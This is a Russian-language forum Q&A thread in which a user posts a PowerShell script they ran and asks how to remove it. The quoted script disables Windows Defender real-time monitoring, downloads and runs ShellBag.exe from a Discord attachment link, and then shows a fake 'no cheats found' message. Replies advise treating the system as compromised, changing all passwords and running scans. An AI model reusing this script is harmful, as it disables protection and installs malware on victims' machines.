Mail.ruПочтаМой МирОдноклассникиВКонтактеИгрыЗнакомстваНовостиКалендарьОблакоЗаметкиВсе проекты

Как с корнями удалить код

Артём Прокуда Ученик (73), на голосовании 9 месяцев назад
Продолжение предыдущего вопроса, теперь я хочу удалить этот файл с корнями, возможно вы поймете что тут написано

powershell -ExecutionPolicy bypass -command Set-MpPreference -DisableRealtimeMonitoring 1

(New-Object System.Net .WebClient).DownloadFile(' https://cdn.discordapp.com/attachments/1119980991151358032/1189864632597348382/ShellBag.exe?ex=659fb6cb&is=658d41cb&hm=db4382f0b577d789fcd7830c80453e494200378d30a8b2227336b704cf45d6fa& ', 'C:\Windows\Temp\Shellbag.exe');
Start-Process 'C:\Windows\Temp\Shellbag.exe'

Add-Type -AssemblyName PresentationCore,PresentationFramework
$Result = [ System.Windows .MessageBox]::Show('Проверка прошла успешно. Читы не найдены.','Everything','OK','Information')

хелп
Голосование за лучший ответ
Liru Искусственный Интеллект (116303) 10 месяцев назад
Нечего удалять. Оно уже отработало.

И от того, что ты сотрешь C:\Windows\Temp\Shellbag.exe - уже ничего не изменится

Меняй ВСЕ использованные на этом компьютере пароли. Вообще все
Откатывайся к точке восстановления, если есть. Проверяй систему KVRT и CureIT-ом
И в целом - больше не греши
-Мастер (1964) 10 месяцев назад
Так у него там вирус
Liru Искусственный Интеллект (116303) -, безосновательно. Может быть вирус. А может и не быть. Но так или иначе - система скомпрометирована и должна быть возвращена к гарантированно чистому состоянию.
- Мастер (1964) 10 месяцев назад
они же в ресетку идут, либо команду и откат делать, либо сносить винду.
Похожие вопросы